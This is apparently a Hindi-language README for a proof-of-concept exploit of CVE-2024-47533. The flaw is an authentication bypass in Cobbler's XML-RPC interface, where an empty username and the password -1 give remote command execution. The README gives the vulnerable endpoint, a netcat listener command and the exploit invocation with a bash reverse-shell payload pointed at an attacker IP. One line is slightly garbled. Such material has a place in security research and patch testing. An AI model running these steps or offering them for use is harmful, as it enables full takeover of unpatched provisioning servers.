
CVE-2024-47533 Cobbler (संस्करण 3.0.0 से 3.2.3 से पहले और 3.3.7) में एक महत्वपूर्ण प्रमाणीकरण बायपास कमजोरी है, जो XMLRPC इंटरफेस के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है।
⚠️ Cobbler में प्रमाणीकरण बाईपास के माध्यम से गंभीर रिमोट कोड निष्पादन
🛠️ @dollarboysushil द्वारा PoC कार्यान्वयन
Cobbler, एक Linux स्थापना सर्वर जो नेटवर्क स्थापना वातावरण के त्वरित सेटअप को सक्षम करता है, में संस्करण 3.0.0 से 3.2.3 और 3.3.7 (लेकिन इन्हें शामिल नहीं) तक एक प्रमाणीकरण भेद्यता है। फ़ंक्शन utils.get_shared_secret() हमेशा -1 लौटाता है, जिससे कोई भी खाली उपयोगकर्ता नाम ('') और पासवर्ड -1 के साथ Cobbler XML-RPC इंटरफ़ेस से कनेक्ट कर सकता है। यह नेटवर्क पहुंच वाले हमलावर को Cobbler सर्वर का पूर्ण नियंत्रण प्राप्त करने की अनुमति देता है। यह भेद्यता संस्करण 3.2.3 और 3.3.7 में ठीक की गई है।
भेद्यता utils.get_shared_secret() फ़ंक्शन में साझा रहस्य के अनुचित हैंडलिंग के कारण होती है, जो हमेशा -1 लौटाता है, प्रभावी रूप से प्रमाणीकरण को बायपास करता है। यह किसी भी नेटवर्क उपयोगकर्ता को खाली क्रेडेंशियल के साथ Cobbler के XMLRPC इंटरफ़ेस से कनेक्ट करने और मनमाने आदेशों को निष्पादित करने की अनुमति देता है।
http://<target>:25151/ — Cobbler का XMLRPC API एंडपॉइंट
शोषण स्क्रिप्ट विभिन्न रिवर्स शेल पेलोड का समर्थन करती है, जिनमें शामिल हैं:
nc, nc2)अपनी मशीन पर Netcat लिसनर प्रारंभ करें:
nc -lvnp 4444

शोषण स्क्रिप्ट CVE-2024-47533-dbs.py चलाएँ।
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

सफल निष्पादन पर, रिवर्स शेल लिसनर से वापस कनेक्ट हो जाएगा, जिससे हमलावर को सर्वर तक रिमोट एक्सेस मिल जाएगी।
